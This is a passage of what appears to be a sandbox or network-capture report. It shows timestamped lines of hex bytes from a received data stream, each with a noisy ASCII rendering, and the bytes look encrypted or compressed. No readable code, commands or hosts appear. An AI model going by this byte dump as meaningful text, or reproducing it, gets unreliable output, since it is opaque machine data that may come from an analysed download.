1d 30 35 e9 ed c6 a3 ee 83 55 bc 96 2c 67 a4
                                            Data Ascii: x&B"r]sg0LmW&Q &;f#2#@#/-MbaONs!Nee~\e8_-Cz_n8fb];Iwnp^n+`7&47:?y@@9a}A,q5l)"k)))-G@]d$~1g90{& ]$r2AI{8`FtV05U,g
                                            2021-11-22 13:23:12 UTC119INData Raw: 36 6e 62 ff 64 ab 8b 2b 49 19 24 4b 10 59 77 70 ae 73 27 a6 f6 3f 98 08 61 6e 6d 04 fd f4 c0 6d 6e 86 da 81 c3 ad 6f ab d7 42 cd b8 1c 99 5a 50 b7 1f eb a9 04 f7 3d 3d 61 1d 80 f5 ff eb 27 79 e8 72 97 ff 49 ce ab 6c fa 14 bc d9 9e 69 3d 8a de 83 2a de b3 cd 21 97 86 86 f3 88 72 14 42 0b be e1 78 26 39 c7 5b 28 48 f0 34 e1 4c d3 7f 71 f9 8f 65 18 b9 7d f0 cc f5 9b 31 52 c9 1e 49 53 02 59 35 2c 3c e5 d6 bb 99 5a e7 a0 4b 9c c1 d7 8e 09 5f a9 00 ea 7c 3d 98 92 b6 16 17 5b a8 82 a1 0e b8 5c a8 ef 7d 72 5b 14 ca 8c 5a e2 6b 13 25 70 08 03 29 dc 26 d2 24 ed b1 8a 8f 32 e4 49 17 fe 1b d6 96 69 3e d4 ec d2 61 a1 3a 4b 7a 16 48 d0 e8 c0 ca e5 02 aa d3 90 10 f1 a9 3a ff 35 b1 36 aa fe 0e 39 c8 cc 04 7f f7 16 31 2f 07 ab 3d ca 0a af 8b 6d 17 0d 47 43 6d 52 2c f7 6b
                                            Data Ascii: 6nbd+I$KYwps'?anmmnoBZP==a'yrIli=*!rBx&9[(H4Lqe}1RISY5,<ZK_|=[\}r[Zk%p)&$2Ii>a:KzH:5691/=mGCmR,k
                                            2021-11-22 13:23:12 UTC120INData Raw: e9 d9 4d 37 b0 61 ae 46 32 d6 f4 4b 27 bb e9 03 21 a0 82 08 da 6e 38 1d 2c dc a3 4e f5 82 79 17 8c e4 b7 cb 45 70 17 66 7f 7a 2c ee 96 6e d7 99 b4 e3 0c 39 37 1b 81 e2 dc 10 b8 ca 40 4a a6 4d 7d fa 3c a7 70 f7 c3 93 39 0d 7c dc 6f a0 95 80 3f fa 33 10 85 2a 21 38 b5 de d1 68 28 89 53 67 eb 3c 6a 24 fc b1 9e 20 8e 00 23 d1 12 84 42 71 92 0c 39 16 b4 3d 91 33 b8 a5 0e 33 1d e1 c8 ef 5d c7 37 f4 93 04 b8 14 87 54 14 65 3b c8 af 0a e1 bf f7 65 13 c6 57 0a 07 b1 06 8c 62 51 f7 b5 0f 1d 27 26 dd fb c5 8f ec ba b8 b7 07 2a 6b ab 5f b5 5c 44 ba e9 7f 42 60 26 d0 9a e5 af 11 5c ce fd 08 61 8f d4 28 c6 ba 19 e0 8a 04 3b e7 30 c0 9d cb 98 49 ef a6 84 d3 5b fc 54 44 cd ba 3a 79 fa 0c a9 c3 7a 06 54 98 60 6f bc 9c 78 d9 0d eb f0 41 ee bf 00 82 cd f5 cf 8d 69 37 33 f0
                                            Data Ascii: M7aF2K'!n8,NyEpfz,n97@JM}<p9|o?3*!8h(Sg<j$ #Bq9=33]7Te;eWbQ'&*k_\DB`&\a(;0I[TD:yzT`oxAi73
                                            2021-11-22 13:23:12 UTC122INData Raw: 81 e9 b8 9e de a2 d0 16 bc 7a 87 d5 ac c9 3c cd 00 87 26 54 1e 26 d9 5c 17 8b e2 23 f8 4a a0 79 5d eb 98 67 31 c7 91 e7 da 73 b3 eb 41 de af 52 6c 04 5e 36 04 8e f2 c9 a9 73 73 08 a4 42 b6 db 45 90 1a 48 a8 02 dc 72 3b 70 85 16 23 06 51 b0 f6 a3 25 b3 60 af d0 de 63 4c 04 20 a5 b5 eb 15 86 32 fd 05 10 2d c6 26 e7 35 de b0 82 1e f3 e5 65 05 4d 0c fd aa 1b 2b fc 45 bd 96 aa 2e 65 aa 18 57 c8 ec 5a cd f4 15 b4 cd 4d 00 fe a8 3d 76 22 9a 33 ab 5a 37 3e dc d8 1a 7f c1 16 31 2f 00 8b e6 c7 19 be 9d f1 07 15 b9 43 55 4f 4b 65 c8 30 84 2c 5e 40 63 4f 8e c0 62 9d 14 d4 e1 eb a4 6f 98 33 a3 42 d2 18 34 6c 07 40 f4 e2 7d 94 ad 60 29 b8 d5 09 ac 49 11 1f a0 05 2e 67 9d ed 3c 6d 7b 9d ac 76 56 07 b8 df af 52 8e c2 d9 b8 70 0a 0a b8 c9 96 4d 48 30 7a 82 ad b5 f4 e6 8f
                                            Data Ascii: z<&T&\#Jy]g1sARl^6ssBEHr;p#Q%`cL 2-&5eM+E.eWZM=v"3Z7>1/CUOKe0,^@cObo3B4l@}`)I.g<m{vVRpMH0z
                                            2021-11-22 13:23:12 UTC123INData Raw: ed c3 f1 20 33 a5 4b f1 3a b5 c6 9b be ce 8b 55 7e 69 07 64 5a ab a3 82 35 83 1b 23 e5 14 84 42 74 14 78 1b 14 b5 2f 96 37 81 16 06 5c 3f cb e0 ec 4c d1 30 d0 53 2b bd 1e 90 60 2e 4f 13 ca 87 e7 f5 32 fa 0a 37 c5 43 18 02 89 b4 87 4a 76 da 9c 0c 35 0f 32 f5 15 ef 64 e4 92 5b da 21 22 7a b1 5a 8d 77 2f 90 ed 69 c9 61 37 c0 f4 e6 ba 05 7e b3 f2 2d 43 90 fe 2d cc af 1b e0 5a 06 3b e7 c6 29 8e c1 85 b7 4f ac 95 d3 66 f6 7b 2d 27 6d 42 6b ef 1d 69 5d 68 17 41 88 62 f5 1f 8b 30 24 f2 1e de f7 ee fe 3e 91 d7 e4 d3 99 41 4c 37 f0 3a 64 b2 50 6f a0 64 db 0e 80 d1 de ea f2 3a ba 16 00 fa 5e 32 f4 2f f8 3e 38 79 ed d0 e6 1f 5b ca cf 2c 8a 3f e6 5e 5c f1 bc ac 62 5a 09 3d 2c 91 eb bb 33 2a d0 f3 2d 5e a1 b7 1f a3 37 ad c8 58 65 87 1d 88 e5 2a cd b7 e8 5d 86 88 d2 c7
                                            Data Ascii: 3K:U~idZ5#Btx/7\?L0S+`.O27CJv52d[!"zZw/ia7~-C-Z;)Of{-'mBki]hAb0$>AL7:dPod:^2/>8y[,?^\bZ=,3*-^7Xe*]
                                            2021-11-22 13:23:12 UTC124INData Raw: ab 22 b3 52 d7 49 bc c3 dc 76 26 62 df a4 9d cb 6b 06 02 f9 0f e9 29 dd 35 f8 34 cf b6 9f fd 18 a9 49 16 5e 08 8a b7 7d 2a f8 32 ac 60 ab 2a 61 69 58 48 d6 fd 65 d9 e5 02 a1 e8 b3 00 d2 b5 51 0e 0b b1 32 a8 48 e1 1b ca 26 11 5d 52 3a 1c 27 10 0d 4e b4 8a a8 9d e4 12 0f 3c c2 78 46 3c f7 90 32 8e 2c 3a 2c 75 4f 9b d4 6b ba 91 aa cc e7 b1 7d e0 dc 88 40 d6 36 c6 48 14 5d f0 e7 94 8a a0 60 29 9f f1 34 93 24 e9 90 17 7e ba 09 4c eb 3e 65 6f e3 ac 76 54 37 8f 0c ad 58 f9 2c 26 b9 74 08 0f ab ad 0b 5f 5f 34 69 ee 30 94 0a e3 8b 56 8d 73 71 e7 a1 dd 36 c9 50 4e b6 d3 fa 1d c8 c9 ba 53 35 d0 07 e9 c6 32 84 a8 31 64 b5 6f 98 a5 17 31 e6 f0 78 7e 3b eb 86 d6 b9 19 8e 43 bd d8 81 ca a2 52 ed 35 5f 0d 1c c7 68 fa 75 40 fa 3c d2 19 bf ac 24 42 5e b9 0b 91 9a 39 77 4e
                                            Data Ascii: "RIv&bk)54I^}*2`*aiXHeQ2H&]R:'N<xF<2,:,uOk}@6H]`)4$~L>eovT7X,&t__4i0Vsq6PNS521do1x~;CR5_hu@<$B^9wN
                                            2021-11-22 13:23:12 UTC125INData Raw: 45 b9 27 17 07 2b ea 3f dd a7 cb 90 51 b3 2d 7a 04 2e 4a 9d 70 5c 20 ca 44 c4 41 3a cf ab ee b7 2d 59 6f fd 0e 41 fd 80 b4 c7 bc 0b d5 f8 23 16 e6 3e 34 80 f7 8d 6e 74 8b 86 d9 71 cb 1f 26 40 93 bd 7e e4 90 9a 63 76 20 4a 86 3f 64 a5 9c f6 db 0d e7 f2 bf 90 26 0b 91 d3 fb da 03 64 32 3b d6 25 66 ad 08 70 f2 4c f6 0c 92 d7 f4 88 96 a3 bb 17 04 e5 54 a8 4c 02 f4 18 4a 72 f2 b4 f3 16 73 e7 c2 2c 8c 15 a2 20 c5 f1 a7 98 74 51 c9 19 01 9a c8 a5 38 24 bd e0 07 65 cc 56 18 89 5f cc 0e 6a 6d 81 15 eb 77 0e e0 b1 c4 44 a2 0b a0 d8 3b 08 9c 46 eb 48 ee 6e c2 bc 14 a4 05 b1 d8 83 4f 3e d0 c2 22 aa 54 38 4e 06 94 aa 33 69 05 63 0b 2f c4 28 65 89 28 57 5a 33 d9 95 8c 93 78 4a 2f 0f da 67 64 a1 80 25 47 39 66 be 11 5f 5b 13 c1 ed 32 8e 1d 24 97 94 53 ce 65 22 e2 fa f3
                                            Data Ascii: E'+?Q-z.Jp\ DA:-YoA#>4ntq&@~cv J?d&d2;%fpLTLJrs, tQ8$eV_jmwD;FHnO>"T8N3ic/(e(WZ3xJ/gd%G9f_[2$Se"
                                            2021-11-22 13:23:12 UTC127INData Raw: 27 13 85 d3 a3 74 30 9c e0 14 12 71 d8 5c 6b 36 f9 d7 06 ae aa 45 53 74 57 b7 fa 7f b8 ec ff a7 99 2c 7e 9b 58 96 77 48 3b 06 44 32 48 c3 d3 e4 89 b6 9e 31 bc db 1a be 20 c7 74 de 9a 39 08 48 f0 04 fd 31 4c a3 50 4f 27 f7 9f af 52 84 b6 0f 94 72 0c 1f 83 bc f4 c7 5e 30 6f 8a 8b 0f 2f ca ad 9d 90 4a 5b 74 b7 23 37 c3 86 62 b8 db d0 70 a0 b2 ad e5 48 50 19 d3 58 15 ab dd 93 7a 8f 4b 2c ff 15 31 f1 a5 d6 7d 3b e9 a9 aa c5 fb 0c 42 b9 c3 b8 2b 03 7e e3 17 68 db 3e 64 60 f8 70 d7 65 6c 56 18 b9 82 48 3e bc 3e 0a 95 81 2d b5 69 14 ba 11 8e a6 06 fe 61 00 0f 3e 9b e4 c9 b7 96 d5 7f f8 ba 11 79 a5 76 91 a0 6c 6f 75 5f 54 4c 8d 87 6c 1e 21 f8 8c 7c b6 0c ae a7 9b 0d 2b 8b ea d9 49 0d a6 cc 8b 6b 36 e3 f9 61 0d 23 d3 03 21 bd 77 c7 da 6e 3e 35 6e 85 3f 4f f3 ae 42
                                            Data Ascii: 't0q\k6EStW,~XwH;D2H1 t9H1LPO'Rr^0o/J[t#7bpHPXzK,1};B+~h>d`pelVH>>-ia>yvlou_TLl!|+Ik6a#!wn>5n?OB
                                            2021-11-22 13:23:12 UTC128INData Raw: df c6 68 7b fd f0 e0 99 15 f4 f7 70 d7 99 41 03 1f dd 38 6f b4 7a 01 80 fd da 0e 96 ce b8 70 cd 17 b5 31 1f 9c 7e a8 6d 2f f8 21 45 50 c0 d2 ec 1b 71 a0 be b5 8b 3f f8 41 3b 6a 82 b1 65 7c 4c 5b 0c 3b ea ba 33 20 fa d4 2d 48 c8 7c 70 dd a4 b3 97 6f 72 ed 90 c2 c0 24 eb a2 8a 7b 01 10 d2 c7 38 2f 99 69 e9 4e c2 2a d6 5b 8c a5 01 aa ca 70 f0 36 f2 ea 1b b8 1d 96 f0 02 94 b5 22 69 05 63 0b 2f c4 28 65 89 28 57 5a 33 bd 95 8c 93 78 4a 2f 6b da 3c 60 a1 80 25 68 39 66 be 11 5f 5b 13 c1 ed 32 8e 1d 24 f3 94 53 ce 65 22 e2 9e f3 9b 7b 98 cc b6 ed 80 42 af 75 55 f9 c2 76 14 73 f3 b3 00 8d 22 26 ce 1a f4 7a 71 a6 11 76 ec 27 66 fc 49 a5 ec 56 de a9 20 81 8d bb 7b 8b 69 44 04 ef 86 87 f8 ac aa 29 a2 81 86 f9 bc e9 39 40 01 81 06 17 58 a0 cf 4f 04 94 9d ae c2 76 51
                                            Data Ascii: h{pA8ozp1~m/!EPq?A;je|L[;3 -H|por${8/iN*[p6"ic/(e(WZ3xJ/k<`%h9f_[2$Se"{BuUvs"&zqv'fIV {iD)9@XOvQ
                                            2021-11-22 13:23:12 UTC129INData Raw: 20 b9 70 16 31 84 d4 8a 58 75 b2 15 0c b3 95 0e c7 32 bb 8f 73 e1 c7 98 32 11 ff 3f 4f ba db f6 23 cd cc 34 fe 60 79 04 e9 c4 1a 04 ad 2c 64 b5 6f 90 6f 15 31 ec 17 de 52 2a c9 a3 52 bb 62 0d 62 c0 db 83 b1 3e 7b c0 33 77 e6 34 45 1c 61 71 ce 49 61 c7 18 bf a8 bc 65 08 2e 2c b1 0d 11 2f 4c 19 ca 30 91 9a 3b 70 4e 02 0f 27 b8 4e 9a 2c 97 d3 51 b2 50 88 78 a5 e8 ab b0 e7 6c 78 c5 72 53 b0 87 45 1b 21 f8 85 7c b6 0c ae a7 9b e5 2b 8b ea d9 49 32 0d 56 ae 46 a2 e0 cb 4e 0b b3 44 03 21 aa 7f 64 df 6e 38 08 2c d6 a4 4e f5 80 df 69 15 ef 9f fe 65 e6 1d 5f b6 e2 09 c3 91 c5 dc 0f b4 e2 1f 02 ba 34 a6 e7 cb 3e bd ec 40 4c 86 bc f0 62 3d a1 67 c3 45 87 56 fc e7 f9 44 de 55 a2 a8 f0 20 35 9d b4 27 38 b5 d6 dc 6d cd 8b 55 47 e5 68 f3 25 e7 a6 a2 a9 92 14 0b 63 33 a9
                                            Data Ascii: p1Xu2s2?O#4`y,doo1R*Rbb>{3w4EaqIae.,/L0;pN'N,QPxlxrSE!|+I2VFND!dn8,Nie_4>@Lb=gEVDU 5'8mUGh%c3
                                            2021-11-22 13:23:12 UTC130INData Raw: de ff 4d d2 f2 2a 86 c2 b3 07 f8 39 52 ea 0b b1 32 8b fb 1f 1a dc 42 35 7a 46 30 11 82 13 83 f9 e9 3a a1 9d e0 0f 04 6f 6f 7b 46 3e f5 4e 4e 17 27 47 57 54 e7 9f d7 7d 22 cf f8 df c1 95 d7 9b 5c 89 60 eb 16 2b 4a 0b 47 dc de 68 8b b0 b4 aa ea 6f 19 be 22 cd b7 a0 03 38 92 69 c2 2d 41 34 c8 ad 76 50 3f 9e 06 ad 52 9f 85 0a bb 70 0a 33 2b a8 13 5f 5f 34 4b 3f b2 95 0a 7d 86 96 9e 55 5b 48 b5 23 37 ff e0 47 ba db cc 72 e7 ce 34 e2 62 d6 78 70 c3 30 82 f3 1e 65 b5 6b 2a d8 38 20 ca ad 50 7f 3b ef a3 92 b3 62 0d 5c 95 f1 81 b1 20 79 6f 4f ee e1 1e c3 42 54 70 ce 4d db 71 35 ae 8e 06 ec 25 3f 0a b1 c4 19 2f 4c 20 9d 1a 93 9a 20 72 e5 7e 96 20 92 c8 c4 18 96 d3 55 08 e1 a5 6a 83 52 23 9d f6 4a 78 0c 7a 53 b0 b8 cc 34 0c fa 9b 52 b1 8c d0 38 b0 67 51 32 45 d9 4d
                                            Data Ascii: M*9R2B5zF0:oo{F>NN'GWT}"\`+JGho"8i-A4vP?Rp3+__4K?}U[H#7Gr4bxp0ek*8 P;b\ yoOBTpMq5%?/L r~ UjR#JxzS4R8gQ2EM
                                            2021-11-22 13:23:12 UTC131INData Raw: 9f cb b2 ea 56 a6 84 c6 54 c9 68 5a d9 94 97 fc 84 93 be 4e 79 26 9a 99 74 7b 32 91 f6 cb 2b c1 16 dd ee bf 2a 3f dd e4 d3 86 63 37 1a f2 3a 69 98 d6 11 67 65 db 0a b2 1e de ea e8 a0 9f 3a 12 dc 7e fd 69 2f f8 1e 85 72 ed d0 f3 3f 73 e7 c2 2c 8c 15 7a 20 c5 f1 a7 98 4b 8a 53 3c 2c 0b cb 97 21 1d f2 29 2f 48 ce 76 ec a9 3d b2 88 48 45 a8 08 e7 eb 01 4b c3 7b 5a ae 10 f2 16 27 20 b1 de ce 63 d6 26 9c f4 15 a4 01 8e c0 12 6a 13 c0 c1 15 8a 76 b6 48 2c 12 cb a0 40 28 65 2b fb ee 46 1b 8a 0c 7a 4c 0a f7 dd a9 be 77 4c 0a 0a fa ff 7b 87 a8 17 4f 11 4d 96 97 27 e8 7c bf 70 13 5d 19 3b 98 94 53 ce 78 22 dd 26 d3 73 7f b8 ac a2 e6 a8 70 8a 5d 7e d1 ac 0e a7 f4 8d 2e 1e e1 bc 23 37 15 d2 65 87 a3 cf 60 ca 07 ad e9 61 88 ce d1 d3 83 4a e0 31 92 56 8d 76 2f b4 4c d5
                                            Data Ascii: VThZNy&t{2+*?c7:ige:~i/r?s,z KS<,!)/Hv=HEK{Z' c&jvH,@(e+FzLwL{OM'|p];Sx"&sp]~.#7e`aJ1Vv/L
                                            2021-11-22 13:23:12 UTC132INData Raw: 28 94 6c 3d 93 37 cb 3e 54 03 38 08 6c 1b 31 67 14 7c 85 5b 52 1f d1 24 2f 2c 1d ac 27 bd 50 f9 19 a9 d6 10 7b 72 21 4d b5 47 95 0a e7 83 40 82 73 7b f8 9d 0e 35 df a8 65 38 a5 4f 5b ca c8 14 12 48 54 06 73 e7 1d 97 f5 95 93 b5 6b b0 dd ea 3c ec 8d e1 57 16 ed 83 c6 91 e0 73 db bc dc 87 91 d1 53 ed 31 ed c5 33 d6 44 d8 87 ce 4d 41 74 1b b1 a8 26 5a 0d 12 08 91 98 3b ad 32 a0 b4 37 95 ba de 58 63 00 95 04 bf dd c2 95 6e d3 55 92 e4 8f 76 a5 72 97 b5 db 48 58 57 58 d1 ce 3e c2 1c 25 d8 62 54 9b 0e 34 84 9c 76 73 32 12 d9 4d 12 b8 5c a0 46 38 d8 ce 72 2f 93 d7 29 a3 d4 c6 eb d8 6a 18 e5 04 fb a6 d4 d6 87 4c 31 ac 14 9f fa 45 50 0c 51 b6 78 31 c6 ad e1 fc 9f 9e 64 61 bb 34 33 a2 c7 27 16 90 ee da 6f 81 2c a8 db c7 a1 63 e3 f2 9f 58 fc 7d c3 64 e7 5e 80 3f f6
                                            Data Ascii: (l=7>T8l1g|[R$/,'P{r!MG@s{5e8O[HTsk<WsS13DMAt&Z;27XcnUvrHXWX>%bT4vs2M\F8r/)jL1EPQx1da43'o,cX}d^?
                                            2021-11-22 13:23:12 UTC134INData Raw: db 2d 8a 3f 66 7b 71 e1 81 bc 70 5b 53 3c 0c 99 fe ba 33 25 fa d4 2d 48 c8 7c 98 dd a4 b3 97 6f 4d 99 0b e7 ed b1 e8 90 f0 7d 8e 08 d3 c7 27 00 a1 54 eb 4e db 21 94 08 17 a4 07 84 53 67 f3 12 df e0 1d ba 75 b6 4e 9c b1 98 2b 67 08 7c 0a 29 ee 66 2a 00 29 57 41 25 ff 22 ab be 71 46 b6 7f 63 fe 64 a5 a0 24 4c 11 4b 26 34 74 63 5b 9f 6a 32 8e 19 1b a2 1e 76 e3 75 17 d5 d8 d1 73 79 b2 4e d7 7f a9 6f a9 55 4c d2 ac 08 17 57 de a6 39 c1 a7 02 e3 15 f2 28 0d 86 e2 69 c4 0a 7b e9 67 a2 68 28 41 82 4a fb 34 9a 7a 8f 76 b3 bb e7 b9 af fe 93 c6 09 aa a4 d4 e9 a0 c1 0b 4d 29 aa 2e 79 20 13 4c 31 99 8a f3 30 c7 7a 5f 78 71 63 ab 5b 29 8e 7d c7 db 79 a4 11 33 d8 bc 58 6d 3e 60 23 04 99 cf 50 cf 14 73 24 a7 6b b8 d7 5a 89 93 7a 85 01 ed 4d 3e 8f 84 3a 09 7e 4b a9 20 af
                                            Data Ascii: -?f{qp[S<3%-H|oM}'TN!SguN+g|)f*)WA%"qFcd$LK&4tc[j2vusyNoULW9(i{gh(AJ4zvM).y L10z_xqc[)}y3Xm>`#Ps$kZzM>:~K
                                            2021-11-22 13:23:12 UTC135INData Raw: 15 37 c6 0b 85 e6 3a ef 87 e0 f9 63 0d 42 27 f9 ae a3 00 73 af 30 77 e0 3e cf 70 f8 70 d1 5e 69 79 1a bf ae 0c c6 5b a6 0b 91 9a 31 6c 4d 39 b5 ad b4 b7 34 7e 43 43 0e 21 92 ec ff a7 96 d3 4a b6 ec a5 7a a5 74 a4 1b 88 d3 59 51 76 73 f4 a6 c3 1c bb dd b6 46 bd 2e ea a0 b1 67 75 2d f9 d9 4d 0d 87 7e 83 44 38 c3 cc d9 53 0a d0 03 25 8a 1a eb d8 6e a2 3a 29 e9 80 6e b6 ab 5d 17 ac b0 8d fa 45 6f 39 77 9b 7a 2c e8 aa 65 82 00 b5 e2 1b 02 73 32 a6 e7 46 33 bd fc 66 6a ea 3f 8e fb 1c 23 71 e3 d2 98 75 d4 50 de 69 c9 59 04 41 69 21 35 b9 04 67 39 b5 cc 6e 65 e2 99 75 4d 20 17 6a 24 c7 07 90 31 92 0b 2f d1 3b 86 44 61 35 8d 47 8f b4 29 81 07 d8 07 0e 33 8d ec cd f8 7b e1 69 dd 7b 06 98 d7 84 48 00 52 1c e4 82 0e f7 34 da e3 6d 5e 42 1e 17 b9 ec 8d 62 5b 45 b9 27
                                            Data Ascii: 7:cB's0w>pp^iy[1lM94~CC!JztYQvsF.gu-M~D8S%n:)n]Eo9wz,es2F3fj?#quPiYAi!5g9neuM j$1/;Da5G)3{i{HR4m^Bb[E'
                                            2021-11-22 13:23:12 UTC136INData Raw: 09 86 47 1b 10 09 32 4b 2c d7 11 81 93 75 6c 36 2b 78 81 fd a0 80 3e 6d 78 4a bc 11 c3 54 50 ae 52 13 e7 18 3b 98 2e 1b f6 6a 04 e3 dd fe 71 7f 9e e6 2b 98 31 6e ad 71 73 b9 ad 08 8d e8 d6 9a 0e c7 98 69 e2 15 d2 45 68 93 e2 72 f6 0f 54 eb 61 8e c4 d4 a6 1a 4b ff 10 9a 10 8e 76 29 04 ef 86 98 f8 93 ac 08 aa 84 a6 80 b5 c1 14 58 29 aa 2e 79 20 13 4c 31 99 8a f3 30 c7 37 5f 78 71 63 ab 5b 29 8e 7d 8a db 79 a4 11 2f dd bc 58 68 3e 60 23 04 99 cf 50 cf 14 73 24 a7 6b f7 d7 5a 89 93 7a 85 01 ed 4d 71 8f 84 3a 09 95 4e a9 20 af 24 84 65 be c7 d8 58 dd 60 47 a5 99 e5 4b 7b 33 fd 0f 99 0c f0 27 d6 15 a1 a6 9d 03 2d 69 5c 16 5c 15 f8 aa 50 28 fc 49 f8 e7 d5 b7 62 b9 11 68 b9 fe 4d cd 7f 27 86 d2 95 21 bd be 2c 73 2a 28 23 ab 5c 00 3a f4 f5 12 57 52 3c b7 5b 8a 82
                                            Data Ascii: G2K,ul6+x>mxJTPR;.jq+1nqsiEhrTaKv)X).y L107_xqc[)}y/Xh>`#Ps$kZzMq:N $eX`GK{3'-i\\P(IbhM'!,s*(#\:WR<[
                                            2021-11-22 13:23:12 UTC138INData Raw: 28 c2 1c 21 62 be 79 89 28 8e 2e b0 67 55 32 49 ce 4d 12 87 45 86 6b 3a c5 e0 75 ab ed 48 02 21 ae 7f 7a d9 6e 38 85 21 d6 b4 68 d3 3a 5c 17 8c ce 2a ed 45 70 02 56 9e 55 2e ee 86 c9 7a e7 2d e3 1f 26 15 a2 a7 e7 dc 8c b5 c3 52 6c 8c af 8f fb 3c 81 dd f4 d2 87 49 f2 55 f1 6b cf 75 a8 b9 8e b9 34 bd 20 00 aa b4 cc f4 da ea a6 41 4b 47 84 6b 24 e7 82 4e 26 92 14 14 f5 3e a9 46 67 19 21 bb 68 2c 28 85 23 b0 95 0f 33 17 53 c5 c7 4c e7 01 4f 7a 06 b8 3e 4e 5f 00 4d 0a e4 82 0e f7 34 da e7 6d 5e 42 1e 17 b9 31 8d 62 5b 45 b9 27 0c 07 10 61 12 c7 8f c6 49 46 b5 07 3b 52 9a 49 9d 72 6a 38 91 f0 ce 67 22 f0 0e f0 bb 05 ee 48 d0 19 4d 87 6b 2c c6 bc 2f 28 75 06 3b f0 30 04 9d cb 94 4b de d8 1d d8 77 e5 65 ce d8 92 bd e0 df 27 ae 68 5d 90 55 99 74 5b 4f a3 db d9 17
                                            Data Ascii: (!by(.gU2IMEk:uH!zn8!h:\*EpVU.z-&Rl<IUku4 AKGk$N&>Fg!h,(#3SLOz>N_M4m^B1b[E'aIF;RIrj8g"HMk,/(u;0Kwe'h]Ut[O
                                            2021-11-22 13:23:12 UTC139INData Raw: e9 65 a8 58 57 d8 83 d0 da 39 ab 5d af c0 28 9e ca 8b c4 c7 b3 c7 14 82 a9 84 f9 a6 eb 96 3c 98 86 2c 7d 06 8e cf 4f 00 11 d6 19 f6 7d 7e cf 70 f9 8e 56 6c b1 5d e6 cd 51 89 33 52 ce 96 da 0d 8f 4c 21 00 bf 5d d7 b1 8d e8 01 8e 5a bc f6 e2 88 09 5f 88 46 d2 6d 1c 92 ac 17 2b 17 5d 83 a2 ce b6 ad 48 b8 e7 67 73 5b 1e 44 81 b4 f0 4d 35 8b fc 0f 03 09 86 2c f0 35 d2 8f b0 01 0d e2 63 94 22 93 f5 82 79 0a 46 4e d2 61 31 0b 4e a8 33 68 6c fe 4d cd c5 60 b2 c0 b3 1d fa 92 2e 73 0c 9b b4 d5 c5 1e 1a d8 f8 ab 56 54 16 ab 00 3e 92 df e9 b1 a8 9d e0 30 65 5e 42 79 5b 10 f2 ca 30 88 0c c1 2d ed 4e 9f d3 5d 04 eb d5 cd 7d 90 52 89 7a a9 fc d3 1e 2b 6a 7b 4e f4 f3 75 93 9e b3 2a 94 f0 32 3c 58 74 1f a0 07 18 b5 4d ef 3c fd 31 4c bc 50 70 a2 d6 0e ad 72 03 b4 27 b9 6d
                                            Data Ascii: eXW9](<,}O}~pVl]Q3RL!]Z_Fm+]Hgs[DM5,5c"yFNa1N3hlM`.sVT>0e^By[0-N]}Rz+j{Nu*2<XtM<1LPpr'm
                                            2021-11-22 13:23:12 UTC140INData Raw: 8a db e1 a0 63 e3 48 a2 7b ed 5b fc b4 ce 73 82 1f e8 3b 35 bd 3c 08 15 b7 cc f2 6a 49 f5 ca 6c 67 12 4a fa e6 a2 82 ab b7 39 19 df 36 5a 45 67 1f 2b 23 0d b5 29 9a 2c b8 2b 0c 33 11 e3 66 94 c4 c0 21 d8 5b d9 b9 1e 96 d2 25 60 01 ea 8f d3 f6 32 f0 45 36 dc 43 1e 0c 89 8d a1 60 5b d9 b6 8c 63 b8 31 f5 17 e7 6f e7 92 51 2f 22 0d 68 91 6b 7d 75 40 ba cf 5c d4 67 26 cf b8 d9 96 07 74 6b d7 8a 15 3e ff 2d c2 9c ee c9 62 06 a1 c8 35 38 b9 eb 73 60 5c a6 a4 81 6c e1 45 41 f1 bf bf 7a fc 20 3d 30 e4 07 54 9d 54 99 a9 b4 db 43 28 cc c9 fb ce 5d 0b 91 d7 c4 88 82 41 1f 2a d8 17 6d b2 56 45 78 1a 42 0f 92 d5 fe 09 e9 3a ba 8d 25 d7 4c 14 49 cc f9 3e 55 58 8f cb ec 1d 44 df e8 01 88 3f fa 74 da 8e 3e 9d 6b 5e 73 d8 2d 91 ee 20 16 16 c0 df 0f ac cf 56 1e 83 4a a9 97
                                            Data Ascii: cH{[s;5<jIlgJ96ZEg+#),+3f![%`2E6C`[c1oQ/"hk}u@\g&tk>-b58s`\lEAz =0TTC(]A*mVExB:%LI>UXD?t>k^s- VJ
                                            2021-11-22 13:23:12 UTC141INData Raw: 5e a9 0d 5d a8 13 51 48 31 9c a2 1a 2d 15 5b a9 00 60 33 ac 48 a3 cc f6 5f 59 1e d8 8e 1b 9f f2 14 32 f9 2f 06 2b dd 35 6a 10 e2 b6 bb 23 08 e6 49 16 7c d1 e8 82 7d 31 d4 62 d0 61 ad 04 e5 c7 8c 49 d6 fb 6d cb e7 02 ab 5a 96 2c c0 99 0c 75 08 b1 36 8b bc 03 1a dc c7 1c 7f 79 14 31 23 39 05 87 50 0b a9 99 c0 17 0f 47 42 e3 63 15 cd ee 10 89 24 47 53 54 a3 83 d7 7d a7 fc fd e0 e5 b5 79 b1 de f7 d9 d3 1e 2f 6a 1c 55 f4 f3 f0 ae 9b 8f 0e b4 fe 1a be 26 cd 1c bd 03 38 16 64 c2 3e 67 12 4b 2b 08 c9 1e d7 0a 8d 5b 86 ad 27 23 55 21 0b 8f f6 83 5c 5f 30 4b 9f af 95 0a f8 a8 93 a2 71 7b e4 9f a5 49 46 af 4f be fb dc 58 ca cc ae c1 65 46 20 c9 c8 32 86 d3 95 70 a8 6b b0 e2 19 19 c1 8f fb 79 11 69 fd 59 ba 62 09 62 b6 de 83 b1 bc 76 c0 23 51 c0 15 c5 62 f8 50 ef 50
                                            Data Ascii: ^]QH1-[`3H_Y2/+5j#I|}1baImZ,u6y1#9PGBc$GST}y/jU&8d>gK+['#U!\_0Kq{IFOXeF 2pkyiYbbv#QbPP
                                            2021-11-22 13:23:12 UTC143INData Raw: 0e f7 34 da e3 6d 5e 42 1e 17 b9 8e 8e 62 5b 45 b9 27 0f 07 10 de 11 c7 8f c6 ba 71 b5 07 3f 22 9f 66 9f 74 46 90 6d 17 56 66 26 d4 bb dd b9 05 74 f7 d8 25 7a 81 de 01 c4 bc 0f e8 e2 26 3b ed 03 01 b2 c9 92 67 76 20 fa 40 76 e1 41 78 f4 90 bd 7a 60 2f 92 5c 5b 26 79 9b 74 7b 88 31 fb d9 0d fe d5 f5 c3 bd 0a 97 fd 62 ad 00 40 1f 33 d0 14 6d b2 50 f5 db 49 c9 28 b2 ff dc ea e8 1a 28 37 00 fa 41 3f 41 02 fa 3e 53 52 6b ae 75 1c 5b ce e0 03 88 3f fc c4 79 dd b5 ba 4b 75 51 3c 2c b1 71 9a 33 3b cd f4 07 65 cc 56 18 89 bb cc 0e 6a 6d 81 2a d7 